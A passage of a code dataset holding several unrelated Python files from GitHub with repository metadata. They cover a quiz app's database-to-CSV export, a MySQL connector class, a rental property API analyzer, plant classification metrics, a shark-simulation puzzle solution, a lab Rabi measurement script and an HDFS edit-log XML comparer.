c.execute(insert,[User_Roll,quiz_no,total_marks])\n db.commit()\n database_to_csv()\n \n #print(\"database marks sub\")\n\ndef database_to_csv():\n with sqlite3.connect('project1_quiz_cs384.db') as db:\n curs = db.cursor()\n curs.execute(\"SELECT * FROM project1_marks\")\n res=curs.fetchall()\n raw_quizes=[]\n for i in res:\n raw_quizes.append(i[1])\n uniq_quizes_name=list(set(raw_quizes))\n \n #print(uniq_quizes_name)\n for file_name in uniq_quizes_name:\n final_fname = \"./quiz_wise_responses/\" + \"scores_\" + file_name + \".csv\"\n if(os.path.exists(final_fname)):\n os.remove(final_fname)\n with open(final_fname, 'w',newline='') as fily:\n writer=csv.writer(fily)\n newheader=['Roll No','Quiz No','Total Marks']\n writer.writerow(newheader)\n for p in res:\n if(p[1]==file_name):\n writer.writerow(list(p))\n else:\n with open(final_fname, 'w',newline='') as fily:\n writer=csv.writer(fily)\n newheader=['Roll No','Quiz No','Total Marks']\n writer.writerow(newheader)\n for p in res:\n if(p[1]==file_name):\n writer.writerow(list(p))\n \n #print(\"database to csv\")\n\ndef database_to_csv_eventpress(event):\n with sqlite3.connect('project1_quiz_cs384.db') as db:\n curs = db.cursor()\n curs.execute(\"SELECT * FROM project1_marks\")\n res=curs.fetchall()\n raw_quizes=[]\n for i in res:\n raw_quizes.append(i[1])\n uniq_quizes_name=list(set(raw_quizes))\n \n #print(uniq_quizes_name)\n for file_name in uniq_quizes_name:\n trim_name=re.split(r'[q]',file_name)\n final_fname=\"quiz\"+str(trim_name[1])+'.csv'\n if(os.path.exists(final_fname)):\n os.remove(final_fname)\n with open(final_fname, 'w',newline='') as fily:\n writer=csv.writer(fily)\n newheader=['Roll No','Quiz No','Total Marks']\n writer.writerow(newheader)\n for p in res:\n if(p[1]==file_name):\n writer.writerow(list(p))\n else:\n with open(final_fname, 'w',newline='') as fily:\n writer=csv.writer(fily)\n newheader=['Roll No','Quiz No','Total Marks']\n writer.writerow(newheader)\n for p in res:\n if(p[1]==file_name):\n writer.writerow(list(p))\n\n# Driver Code Starts Here...\nUser_Name = \"\"\nUser_Roll = \"\"\nquiz_no = \"\"\nques_no = 0\ntotal_marks = 0\nmarked = []\nunatt = 0\nstop_timer = False\nsubm_called = 0\nlogin_window()","repo_name":"pranshukapri/CS384_1801ME44","sub_path":"Projects/P1 Quiz_via_CSV/p1_main.py","file_name":"p1_main.py","file_ext":"py","file_size_in_byte":23098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42318830606","text":"import time\n\nimport pandas\nimport pymysql\nimport pymysql.cursors\nfrom util.database.db_info import *\n\nclass db_connecter():\n def __init__(self,db_info_gubu = \"local\",host_name=\"\",port_num=\"\" , db_name=\"\",user=\"\",pw=\"\"):\n self._db_info ={ 'host' : host_name,\n 'port' : port_num,\n 'database' : db_name,\n 'user' : user,\n 'password' : pw\n }\n\n self.db_info_gubu = db_info_gubu\n\n self._now_db_info_bool = False\n\n self.all_analyze_bool = False\n\n self._exist_skip_dic ={}\n\n self._init_fun(db_info_gubu)\n\n\n\n\n def _init_fun(self,gubu):\n\n #qubu정보를 이용하여 호출자가 입력한 정보중 없는 정보 입력\n if gubu in db_info_name.keys():\n for key in db_info_name[gubu].keys():\n if self._db_info[key] == \"\":\n self._db_info[key] = db_info_name[gubu][key]\n else :\n for key in self._db_info.keys():\n if self._db_info[key] == \"\":\n return\n self._now_db_info_bool = True\n\n if not self._now_db_info_bool :\n if self._db_info['database'] != db_info_name[gubu]['database'] :\n self._base_exist(self._db_info['database'])\n else:\n self._base_exist(self._db_info['database'])\n\n #if not self.all_analyze_bool:\n # self.all_analyze_table()\n\n def _base_exist(self,db_na):\n exist_db = pymysql.connect(host=self._db_info['host'], user=self._db_info['user'], password=self._db_info['password'])\n mydbcur = exist_db.cursor()\n mydbcur.execute('SHOW DATABASES')\n if str(mydbcur.fetchall()).find(db_na) == -1:\n mydbcur.execute('CREATE DATABASE {}'.format(db_na))\n exist_db.commit()\n exist_db.close()\n\n def _create_connection(self):\n conn = pymysql.connect(charset='utf8',**self._db_info)\n return conn\n\n def all_analyze_table(self):\n sql = f\"select table_name, table_rows from information_schema.tables where table_schema = '{self._db_info['database']}'\"\n all_table_df = self.select_db_to_df(sql)\n for table_name in all_table_df['table_name'].values :\n sql = f\"ANALYZE TABLE {table_name}\"\n self._conn_fetchone(sql)\n self.all_analyze_bool = True\n #print(\"all table analyze update 작업완료..!!\")\n\n def one_analyze_table(self,table_name):\n if self.check_table_exist(table_name=table_name):\n sql = f\"ANALYZE TABLE {table_name}\"\n self._conn_fetchone(sql)\n #print(f'{table_name} table analyze 작업완료..!!')\n\n def _conn_fetchone(self,sql):\n con = self._create_connection()\n cur = con.cursor()\n cur.execute(sql)\n con.commit()\n con.close()\n\n def _conn_fetchall_df(self,sql):\n con = self._create_connection()\n cur = con.cursor()\n cur.execute(sql)\n temp_date = cur.fetchall()\n temp_name = cur.description\n con.commit()\n con.close()\n\n col_name =[]\n df_data=[]\n for x in temp_name:\n col_name.append(x[0])\n for y in temp_date:\n df_data.append(list(y))\n\n result = pandas.DataFrame(data=df_data, columns=col_name)\n\n return result\n\n def _conn_executemany(self,sql,list):\n con = self._create_connection()\n cur = con.cursor()\n cur.executemany(sql,list)\n con.commit()\n con.close()\n\n def index_exist(self,table_name,unique_col=\"id\"):\n\n sql = f\"SHOW INDEX FROM {table_name} WHERE KEY_NAME = 'uk_name'\"\n temp = self.select_db_to_df(sql)\n\n if not temp.empty:\n\n if temp['Key_name'].values[0] == 'uk_name':\n\n sql = f\"ALTER TABLE {table_name} DROP INDEX uk_name\"\n self._conn_fetchone(sql)\n\n sql = f\"ALTER TABLE {table_name} ADD UNIQUE KEY uk_name({unique_col})\"\n self._conn_fetchone(sql)\n else:\n sql = f\"ALTER TABLE {table_name} ADD UNIQUE KEY uk_name({unique_col})\"\n self._conn_fetchone(sql)\n\n self.one_analyze_table(table_name=table_name)\n\n\n def check_table_exist(self,table_name=\"\",list_return =False):\n\n if list_return or table_name == \"\":\n sql=f\"select table_name, table_rows from information_schema.TABLES where TABLE_SCHEMA = '{self._db_info['database']}' and TABLE_NAME LIKE '{table_name}%';\"\n else:\n sql=f\"SELECT table_name, table_rows FROM Information_schema.tables WHERE table_schema = '{self._db_info['database']}' AND table_name = '{table_name}'\"\n\n result =self._conn_fetchall_df(sql)\n\n if not result.empty and not list_return and table_name != \"\":\n return True\n elif list_return :\n return result\n else:\n return False\n\n def check_colum_exist(self, table_name, col_dict={}, option=''):\n sql = f\"SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '{self._db_info['database']}' AND TABLE_NAME = '{table_name}';\"\n result= self._conn_fetchall_df(sql)\n resulta =[]\n if not result.empty:\n resulta = list(result['COLUMN_NAME'].values)\n count = 0\n not_col_dict = {}\n for col_name in col_dict.keys():\n if not col_name in result['COLUMN_NAME'].values:\n count = count + 1\n not_col_dict[col_name] = col_dict[col_name]\n\n if count != 0 and option == 'append':\n col_info = self.col_name_type_mk(not_col_dict)\n sql = \"ALTER TABLE {} ADD ({})\".format(table_name, col_info)\n self._conn_fetchone(sql)\n else:\n pass\n return resulta\n\n def col_name_type_mk(self,col_dict):\n col_info_list = []\n for col in col_dict.keys():\n if str(col_dict[col]).find('int') != -1:\n this_type = 'DOUBLE'\n elif str(col_dict[col]).find('str') != -1:\n this_type = 'TEXT'\n elif str(col_dict[col]).find('float') != -1:\n this_type = 'FLOAT(11)'\n else:\n this_type = 'TEXT'\n col_info_list.append(\" {} {}\".format(col, this_type))\n col_info = \",\".join(map(str, col_info_list))\n return col_info\n\n def select_db_to_df(self,sql,table_name=\"\"):\n if table_name != \"\":\n self.one_analyze_table(table_name=table_name)\n resulte_df = self._conn_fetchall_df(sql)\n return resulte_df\n\n def create_table(self,col_dict,table_name):\n col_info = self.col_name_type_mk(col_dict)\n sql = \"CREATE TABLE {} (id INT(11) NOT NULL AUTO_INCREMENT PRIMARY KEY, {} ,UNIQUE KEY uk_name(id))\".format(table_name,col_info)\n self._conn_fetchone(sql)\n\n def del_table(self,table_name,con=\"\"):\n if self.check_table_exist(table_name=table_name) :\n sql = \"DROP TABLE IF EXISTS {}\".format(table_name)\n self._conn_fetchone(sql)\n\n def insert_df_to_db(self,table_name, df, option=\"replace\",unique_col=\"\"):\n turn = True # replace의 경우 테이블 유무에 따라 삭제와 생성 그리고 삽입에 단계로 인한 반복제어문.\n col_check_option = 'append'# 실제db에 컬럼리스트 요청시 필요사항.\n create_bool = False\n col_count_list = []\n if 'id' in df.columns:\n del df['id']\n for i in df.columns:\n col_count_list.append(\"%s\")\n col_info = \",\".join(map(str, col_count_list))\n\n if not self.check_table_exist(table_name):\n\n self.create_table(df.dtypes.to_dict(),table_name)\n create_bool = True\n\n while turn:\n if option == 'append' or create_bool :\n\n self.index_exist(table_name)\n\n self.check_colum_exist(table_name=table_name, col_dict=df.dtypes.to_dict(), option='append')\n\n sql = \"INSERT INTO {} VALUES (NULL,{})\".format(table_name,col_info)\n\n print(table_name,sql)\n\n self._conn_executemany(sql,df.values.tolist())\n\n turn = False\n\n\n elif option == 'replace':\n if not create_bool :\n self.del_table(table_name)\n self.create_table(df.dtypes.to_dict(), table_name)\n create_bool = True\n\n elif option == 'upsert':\n if unique_col != \"\":\n\n self.index_exist(table_name, unique_col=unique_col)\n\n col_list = list(df.columns)\n upsert_list = []\n\n for col in df.columns:\n if col != unique_col:\n upsert_list.append(\"{} = VALUES({})\".format(col,col))\n upsert_col_info = \",\".join(map(str, col_list))\n upsert_info = \",\".join(map(str, upsert_list))\n\n sql = \"INSERT INTO {} (id,{}) VALUES (NULL,{}) ON DUPLICATE KEY UPDATE {}\".format(table_name,upsert_col_info,col_info,upsert_info)\n self._conn_executemany(sql,df.values.tolist())\n turn=False\n\n else:\n turn=False\n\n\n\nif __name__=='__main__':\n #db_out = db_connecter(db_info_gubu='azure')\n db_in = db_connecter(db_info_gubu='local')\n #table_list = db_out.check_table_exist( table_name=\"real_deal_date\", list_return=True)\n #for table_name in table_list['table_name'].values :\n # print(table_name)\n # sql = f'select * from {table_name}'\n # in_df=db_out.select_db_to_df(sql)\n # in_df = in_df.drop(['id'],axis=1)\n # db_in.insert_df_to_db(table_name,in_df)\n\n sql = f\"select table_name, table_rows, update_time from information_schema.tables where table_schema = 'lkwstock'\"\n df = db_in.select_db_to_df(sql)\n df_table = db_in.check_table_exist(table_name=\"real_deal_date\",list_return=True)\n df.sort_values(by=['update_time'], ascending=False, inplace=True)\n print(df)\n print(type(df['update_time'].values[0]))\n update_time = df['update_time'].values[0]\n print(type(time.time()))\n print(time.time() - update_time)","repo_name":"qpt0308/lkwstock_kiwoom","sub_path":"util/database/db_connecter_0906.py","file_name":"db_connecter_0906.py","file_ext":"py","file_size_in_byte":10448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33086161492","text":"import os\nfrom datetime import timedelta\nfrom typing import List\n\nimport requests\nfrom dotenv import load_dotenv\nfrom ratelimit import limits, sleep_and_retry\n\nfrom Property import Property\nfrom PropertyModel import PropertyModel\nfrom database import Session\n\nload_dotenv()\n\n\ndef print_properties(props):\n for prop in props:\n print(f\"Property ID: {prop.property_id}\")\n print(f\"MLS Number: {prop.mls_number}\")\n print(f\"Description: {prop.description}\")\n print(f\"Street Address: {prop.street_address}\")\n print(f\"City: {prop.city}\")\n print(f\"Province: {prop.province}\")\n print(f\"Postal Code: {prop.postal_code}\")\n print(f\"Latitude: {prop.latitude}\")\n print(f\"Longitude: {prop.longitude}\")\n print(f\"Property Type: {prop.property_type}\")\n print(f\"Price: {prop.price}\")\n print(f\"Bedrooms: {prop.bedrooms}\")\n print(f\"Bathrooms: {prop.bathrooms}\")\n print(f\"Projected Profit: {prop.calculate_profitability(5, 6, 550)}\")\n print()\n\n\ndef calculate_bedrooms_and_bathrooms(property_data):\n beds = 0\n baths = 0\n\n if property_data[\"Property\"][\"Type\"] == \"Single Family\":\n for c in property_data[\"Building\"][\"Bedrooms\"]:\n if c.isdigit():\n beds += int(c)\n for c in property_data[\"Building\"][\"BathroomTotal\"]:\n if c.isdigit():\n baths += int(c)\n\n return beds, baths\n\n\ndef get_profitable_properties(properties: List[Property]) -> List[Property]:\n profitable_properties = []\n for prop in properties:\n if prop.calculate_profitability(5, 6, 550) >= -300:\n profitable_properties.append(prop)\n return profitable_properties\n\n\nclass PropertyAnalyzer:\n def __init__(self):\n self.url = \"https://realty-in-ca1.p.rapidapi.com/properties/list-residential\"\n self.headers = {\n \"X-RapidAPI-Key\": os.environ.get(\"RAPIDAPI_KEY\"),\n \"X-RapidAPI-Host\": os.environ.get(\"RAPIDAPI_HOST\"),\n }\n\n @sleep_and_retry\n @limits(calls=3, period=timedelta(minutes=1).total_seconds())\n def call_api(self):\n querystring = {\n \"LatitudeMax\": \"42.309842\",\n \"LatitudeMin\": \"42.298578\",\n \"LongitudeMax\": \"-83.045481\",\n \"LongitudeMin\": \"-83.095084\",\n \"CurrentPage\": \"1\",\n \"RecordsPerPage\": \"10\",\n \"SortOrder\": \"A\",\n \"SortBy\": \"1\",\n \"CultureId\": \"1\",\n \"NumberOfDays\": \"0\",\n \"BedRange\": \"0-0\",\n \"BathRange\": \"0-0\",\n \"RentMin\": \"0\",\n }\n\n response = requests.get(self.url, headers=self.headers, params=querystring)\n\n if response.status_code != 200:\n raise Exception(\"API response: {}\".format(response.status_code))\n\n return response\n\n def get_all_unique_properties(self) -> List[Property]:\n unique_properties = []\n session = Session()\n\n try:\n response_dict = self.call_api().json()\n\n for property_data in response_dict[\"Results\"]:\n beds, baths = calculate_bedrooms_and_bathrooms(property_data)\n\n prop = Property(\n property_id=property_data[\"Id\"],\n mls_number=property_data[\"MlsNumber\"],\n description=property_data[\"PublicRemarks\"],\n street_address=property_data[\"Property\"][\"Address\"][\"AddressText\"]\n .split(\"|\", 1)[0]\n .strip(),\n city=property_data[\"Property\"][\"Address\"][\"AddressText\"]\n .split(\"|\", 1)[-1]\n .split(\", \", 1)[0]\n .strip(),\n province=property_data[\"Property\"][\"Address\"][\"AddressText\"]\n .split(\", \", 1)[-1]\n .rsplit(\" \", 1)[0]\n .strip(),\n postal_code=property_data[\"Property\"][\"Address\"][\"AddressText\"]\n .rsplit(\" \", 1)[-1]\n .strip(),\n latitude=float(property_data[\"Property\"][\"Address\"][\"Latitude\"]),\n longitude=float(property_data[\"Property\"][\"Address\"][\"Longitude\"]),\n property_type=property_data[\"Property\"][\"Type\"],\n price=int(property_data[\"Property\"][\"PriceUnformattedValue\"]),\n bedrooms=beds,\n bathrooms=baths,\n )\n prop_model = PropertyModel(\n property_id=prop.property_id,\n mls_number=prop.mls_number,\n description=prop.description,\n street_address=prop.street_address,\n city=prop.city,\n province=prop.province,\n postal_code=prop.postal_code,\n latitude=prop.latitude,\n longitude=prop.longitude,\n property_type=prop.property_type,\n price=prop.price,\n bedrooms=beds,\n bathrooms=baths,\n )\n\n existing_property = (\n session.query(PropertyModel)\n .filter_by(property_id=prop.property_id)\n .first()\n )\n\n if prop.property_type == \"Single Family\":\n if existing_property:\n existing_property.description = prop.description\n if prop.price != existing_property.price:\n existing_property.price = prop.price\n unique_properties.append(prop)\n else:\n unique_properties.append(prop)\n session.add(prop_model)\n\n session.commit()\n except Exception as e:\n print(f\"Error: {e}\")\n session.rollback()\n finally:\n session.close()\n return unique_properties\n","repo_name":"zainaraza43/rental-property-estimator","sub_path":"PropertyAnalyzer.py","file_name":"PropertyAnalyzer.py","file_ext":"py","file_size_in_byte":5998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14981573617","text":"import json\nfrom os.path import join\nfrom os import listdir\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nfrom config.path import PATH\nfrom data import get_mini_plantnet, MiniPlantNet\nimport pandas as pd\n\n \ndef make_df(df1_path, df2_path, name_clusters_path, species_to_num_samples_path):\n df1 = pd.read_csv(df1_path)\n df2 = pd.read_csv(df2_path)\n with open(species_to_num_samples_path, 'r') as file:\n name_to_train_samples = json.load(file)\n\n with open(name_clusters_path, 'r') as file:\n name_clusters = json.load(file)\n \n size_of_cluster = {}\n proportion_in_cluster = {}\n cluster_id = {}\n \n _id = 0\n for cluster_member in list(name_clusters.values()):\n _id+=1\n total_samples_in_cluster = 0\n for member in cluster_member:\n size_of_cluster[member] = len(cluster_member)\n cluster_id[member] = _id\n total_samples_in_cluster+=name_to_train_samples[member]\n for member in cluster_member:\n proportion_in_cluster[member] = name_to_train_samples[member]/total_samples_in_cluster \n\n train_samples = [] \n proportion = []\n family_size = []\n id_list = []\n for name in df1.name:\n train_samples.append(name_to_train_samples[name])\n proportion.append(proportion_in_cluster[name])\n family_size.append(size_of_cluster[name])\n id_list.append(cluster_id[name])\n\n df1['train_samples'] = train_samples\n df1['test_samples'] = df1[\"samples_per_class\"]\n df1['proportion'] = proportion\n df1['family_size'] = family_size\n df1['cluster_id'] = id_list\n df3 = df1[['name', 'train_samples', 'test_samples', 'family_size', 'proportion', 'cluster_id', 'recall']]\n df3['recall_gap'] = df2['recall'] - df1['recall']\n return df3\n\n\n\n'''\nimport json\nfrom os.path import join\nfrom os import listdir\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nfrom config.path import PATH\nfrom data import get_mini_plantnet, MiniPlantNet\nimport pandas as pd\n\n\ntransforms = {\n 'train': A.Compose([\n A.Resize(height=380, width=380),\n A.HorizontalFlip(p=0.5),\n A.Normalize(mean=0.0, std=1.0),\n ToTensorV2()]),\n 'val': A.Compose([\n A.Resize(height=380, width=380),\n A.Normalize(mean=0.0, std=1.0),\n ToTensorV2()]),\n 'test': A.Compose([\n A.Resize(height=380, width=380),\n A.Normalize(mean=0.0, std=1.0),\n ToTensorV2()])\n}\n \ndataset = MiniPlantNet(root=PATH[\"PLANTNET-300K\"], split=\"train\", shuffle=False, transform=transforms[\"test\"])\n\n#mini plantnet의 학습데이터 수\nlabel_to_train_samples = {}\nname_to_train_samples = {}\nfor name, label in zip(dataset.name_to_label.keys(), dataset.name_to_label.values()):\n num_samples = len(listdir(join(PATH[\"PLANTNET-300K\"], \"images\", \"train\", label)))\n label_to_train_samples[label] = num_samples\n name_to_train_samples[name] = num_samples\nwith open(\"/home/files/uos_plantclassification/data/mini_plantnet/name_to_train_samples.json\", 'w', encoding='utf-8') as file:\n json.dump(name_to_train_samples, file, ensure_ascii=False, indent=2)\n\n'''","repo_name":"hukim1112/uos_plantclassification","sub_path":"jupyters/mod/read_metric.py","file_name":"read_metric.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"27442511904","text":"from copy import deepcopy\r\n\r\ndef check(x, y):\r\n return 0 <= x < 4 and 0 <= y < 4\r\n\r\ndef find_fish(fish, fish_num):\r\n for x in range(4):\r\n for y in range(4):\r\n if fish[x][y][0] == fish_num:\r\n return [x, y]\r\n return False\r\n\r\ndef move_fish(x, y, fish):\r\n for fish_num in range(1, 17):\r\n now = find_fish(fish, fish_num)\r\n\r\n if not now:\r\n continue\r\n\r\n fx, fy = now\r\n fish_dir = fish[fx][fy][1]\r\n\r\n for z in range(8):\r\n nxt = (fish_dir + z) % 8\r\n dx, dy = d[nxt]\r\n nx, ny = fx + dx, fy + dy\r\n\r\n if not check(nx, ny) or (nx, ny) == (x, y):\r\n continue\r\n fish[fx][fy][1] = nxt\r\n fish[fx][fy], fish[nx][ny] = fish[nx][ny], fish[fx][fy]\r\n break\r\n\r\ndef dfs(x, y, eat, fish):\r\n global answer\r\n\r\n point = fish[x][y][0]\r\n eat += point\r\n fish[x][y] = [0, fish[x][y][1]]\r\n\r\n move_fish(x, y, fish)\r\n\r\n if answer < eat:\r\n answer = eat\r\n\r\n for i in range(1, 4):\r\n dx, dy = d[fish[x][y][1]]\r\n nx, ny = x + dx * i, y + dy * i\r\n\r\n if not check(nx, ny):\r\n continue\r\n\r\n if fish[nx][ny][0] == 0:\r\n continue\r\n\r\n temp = deepcopy(fish)\r\n dfs(nx, ny, eat, temp)\r\n\r\nif __name__ == \"__main__\":\r\n d = [(-1, 0), (-1, -1), (0, -1), (1, -1), (1, 0), (1, 1), (0, 1), (-1, 1)]\r\n\r\n fish = []\r\n for i in range(4):\r\n save = list(map(int, input().split()))\r\n fish.append([[save[j*2], save[j*2+1]-1] for j in range(4)])\r\n\r\n answer = 0\r\n dfs(0, 0, 0, fish)\r\n print(answer)\r\n","repo_name":"NEU-chaldea/algorithm","sub_path":"백준/Gold/19236. 청소년 상어/청소년 상어.py","file_name":"청소년 상어.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70805688091","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@date: 2021/4/3 下午3:16\n@file: pytorch_imagefolder.py\n@author: zj\n@description: \n\"\"\"\n\nimport os\nimport imageio\nimport numpy as np\nfrom PIL import Image\nfrom torch.utils.data import DataLoader\nfrom torchvision.datasets import ImageFolder\n\nfrom . import registry\nfrom .base_anno import BaseAnno\nfrom ..util.logger import setup_logger\nfrom ..util.misc import get_cpu_count\n\n\ndef raw_reader(path):\n image = np.array(Image.open(path).convert('RGB'))\n file_path = f'.{os.path.splitext(os.path.split(path)[1])[0]}.jpg'\n imageio.imwrite(file_path, image)\n\n with open(file_path, 'rb') as f:\n bin_data = f.read()\n os.remove(file_path)\n return bin_data\n\n\n# fix TypeError: batch must contain tensors, numbers, dicts or lists; found \ndef collate_fn(batch):\n assert len(batch) == 1\n image, target = batch[0]\n return image, target\n\n\n@registry.ANNOS.register('imagefolder')\nclass PytorchImageFolder(BaseAnno):\n\n def __init__(self, cfg) -> None:\n self.name = cfg.IMAGEFOLDER.NAME\n\n if cfg.ANNO.PARSER == self.name:\n self.src_dir = cfg.INPUT.DIR\n self.image_folder = cfg.INPUT.IMAGE_FOLDER\n\n self.num_workers = int(\n get_cpu_count() / 2) if cfg.IMAGEFOLDER.NUM_WORKERS == -1 else cfg.IMAGEFOLDER.NUM_WORKERS\n\n self.verbose = cfg.ANNO.VERBOSE\n self.logger = setup_logger(__name__)\n\n def process(self) -> dict:\n image_path = os.path.join(self.src_dir, self.image_folder)\n data_set = ImageFolder(image_path, loader=raw_reader)\n data_loader = DataLoader(data_set, num_workers=self.num_workers, collate_fn=collate_fn, batch_size=1)\n\n return {'dataloader': data_loader, 'classes': data_set.classes}\n\n def save(self, input_data: dict):\n super(PytorchImageFolder, self).save(input_data)\n pass\n","repo_name":"zjykzj/pnno","sub_path":"pnno/anno/pytorch_imagefolder.py","file_name":"pytorch_imagefolder.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"9901142782","text":"import numpy as np\nfrom nidaqmx.constants import *\nfrom nidaqmx.constants import(\n Edge,\n CountDirection,\n AcquisitionType,\n FrequencyUnits\n)\nfrom PlotPulse import *\nfrom Rabi import *\nimport dataReader\n\n####################################################################################################################\n\n\nfor i in np.linspace(1000,2000,1):\n # Rabi\n start = 10; stop = 370; num_sweep_points = 61; ifLooped = False\n tausArray = np.linspace(start, stop, num_sweep_points)\n uwPower = -25; uwFreq = 2.870e9\n if True: #uwFreq != 2.868e9:\n print(uwFreq)\n\n # Test for pulsed ODMR\n num_loops = int(0.6e6)\n laser_init_delay = 0; laser_init_duration = 0\n laser_to_MWI_delay = 1000; \n laser_to_DAQ_delay = 850; read_duration = 200\n DAQ_to_laser_off_delay = 2500; MWI_to_switch_delay = 10 # cannot be between 0 and 10\n\n settings = {'start': start, 'stop': stop, 'num_sweep_points': num_sweep_points, 'num_loops':num_loops, 'uwPower':uwPower, 'uwFreq': uwFreq,\n 'laser_init_delay': laser_init_delay, 'laser_init_duration': laser_init_duration,\n 'laser_to_MWI_delay': laser_to_MWI_delay , \n 'laser_to_DAQ_delay': laser_to_DAQ_delay , 'read_duration': read_duration,\n 'DAQ_to_laser_off_delay': DAQ_to_laser_off_delay,'MWI_to_switch_delay': MWI_to_switch_delay}\n\n start = time.time()\n RabiObject = Rabi(settings=settings, ifPlotPulse=not(ifLooped)) # this is implemented as an Instrument\n RabiObject.runScan()\n print('Total time = ' + str(time.time() - start) + ' s')\n\n if not ifLooped: dataFilename = RabiObject.getDataFilename()\n guess=(0.2, 50, 0, 0.9)\n dataReader.readData(dataFilename, type='Rabi', guess=guess)\n RabiObject.close()\n \n\n\n\n\n","repo_name":"lukinlab2d/B00_codes","sub_path":"RabiTest.py","file_name":"RabiTest.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40294992784","text":"import pandas\n\n\ndef find(data_train):\n print(\"find\")\n probability_a = 0.0\n probability_b = 0.0\n number_a = 0.0\n number_b = 0.0\n for p in range(1600):\n if data_train.values[p, 1593] == 1:\n probability_a = probability_a + 1\n number_a = number_a + 1\n elif data_train.values[p, 1593] == -1:\n probability_b = probability_b + 1\n number_b = number_b + 1\n probability_a = probability_a / 1600\n probability_b = probability_b / 1600\n return probability_a, number_a, probability_b, number_b\n\n\ndata_set_train = pandas.read_csv('train.csv', header=None)\ndata_set_test = pandas.read_csv('test.csv', header=None)\n\nprobability_a, number_a, probability_b, number_b = find(data_set_train)\nprint(probability_a)\nprint(number_a)\nprint(probability_b)\nprint(number_b)\n","repo_name":"ehsansouri23/Probability-and-Statistics-hws","sub_path":"first/q2/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43108393940","text":"import xml.etree.ElementTree as ET\r\nimport time\r\nimport ssh\r\n\r\n# sorry for using global\r\n# since it is easier to add this feature\r\nignore_list = ['TIMESTAMP', 'MTIME', 'ATIME']\r\n\r\n# line number\r\nline_id = 0\r\n\r\n\r\n# txid list\r\n# txid_list=list()\r\n\r\n# for each node of root\r\n# append the line to list\r\ndef walkData(root_node, result_list):\r\n global line_id\r\n line_id += 1\r\n root_tag = root_node.tag\r\n text = root_node.text\r\n # if(text==None):\r\n # print(root_tag+' '+\"Text is none...\\n\")\r\n if (root_tag not in ignore_list):\r\n temp_list = [root_tag, text, line_id]\r\n result_list.append(temp_list)\r\n\r\n children_node = root_node.getchildren()\r\n if len(children_node) == 0:\r\n return\r\n for child in children_node:\r\n walkData(child, result_list)\r\n return\r\n\r\n\r\n# in:\r\n# a file\r\n# out:\r\n# records_list: a list of records\r\n# record is a list of lines\r\ndef getXmlData(file_name):\r\n # level = 1 #节点的深度从1开始\r\n result_list = []\r\n root = ET.parse(file_name).getroot()\r\n # walkData(root, level, result_list)\r\n walk_data_by_records(root, result_list)\r\n return result_list\r\n\r\n\r\ndef walk_data_by_records(root_node, result_list):\r\n record_list = []\r\n root_tag = root_node.tag\r\n if (root_tag == 'RECORD'):\r\n # this is a records node\r\n # should return a list of this record\r\n\r\n # line id\r\n global line_id\r\n line_id = 0\r\n walkData(root_node, record_list)\r\n\r\n result_list.append(record_list)\r\n elif (root_tag == 'EDITS'):\r\n children_node = root_node.getchildren()\r\n\r\n if len(children_node) == 0:\r\n return\r\n for child in children_node:\r\n walk_data_by_records(child, result_list)\r\n else:\r\n pass\r\n\r\n\r\ndef str_xml_list(xml_list):\r\n \"\"\"\r\n :param xml_list: a like : ['OPCODE','OP_ADD']\r\n :return: a str like ' OP_ADD'\r\n \"\"\"\r\n tmp = ' '\r\n try:\r\n # for i in xml_list:\r\n # if(i!=None):\r\n # if(i!='\\n'):\r\n # tmp=tmp+i\r\n if (xml_list[0] != None):\r\n if (xml_list[1] != None):\r\n if (not xml_list[1].startswith('\\n')):\r\n tmp = ' <' + xml_list[0] + '>: ' + xml_list[1]\r\n else:\r\n if (xml_list[0] == \"DATA\"):\r\n tmp = ''\r\n else:\r\n tmp = ' <' + xml_list[0] + '>: '\r\n else:\r\n tmp = ' <' + xml_list[0] + '>: '\r\n return tmp\r\n except:\r\n if (xml_list[0] != None):\r\n if (xml_list[1] != None):\r\n if (not xml_list[1].startswith('\\n')):\r\n return xml_list[0] + xml_list[1]\r\n else:\r\n return ' <' + xml_list[0] + '>: '\r\n else:\r\n return xml_list[0]\r\n else:\r\n return \"【error】: List is NULL\"\r\n\r\n\r\ndef compare_list_diff(list1,list2,diff_position,txid,ret_list):\r\n \"\"\"\r\n compare two list on given rules\r\n out:\r\n append a list to ret_list which will be written into files\r\n output only if different\r\n output a list containing the difference info\r\n \"\"\"\r\n output=list()\r\n\r\n try:\r\n if(list1[diff_position]!=list2[diff_position]):\r\n # wtite txid only once for each record\r\n if(len(ret_list)==0):\r\n ret_list.append(txid)\r\n ret_list.append(\"The Diff Part:\\n\")\r\n else:\r\n pass\r\n tmp=' (NN41) '+list1[diff_position]+\" -- \"+'(NN42)'+list2[diff_position]\r\n head=' ('+'Line Number: '+str(list1[2])+')'+'<'+list1[0]+'>'\r\n output=head+tmp\r\n else:\r\n pass\r\n\r\n if(len(output)!=0):\r\n ret_list.append(output)\r\n except:\r\n print(\" From compare_list Except......\")\r\n print('' + str(txid))\r\n print(list1)\r\n print(list2)\r\n\r\ndef operate_TXID(file_list,op):\r\n operate_TXID=[]\r\n for i in range(len(file_list)):\r\n if (file_list[i][1][1]==op):\r\n operate_TXID.append(i+1)\r\n return operate_TXID\r\n\r\ndef list_ALL_MK(txid,list,op):\r\n ret=[]\r\n ret.append([txid,op])\r\n for l in 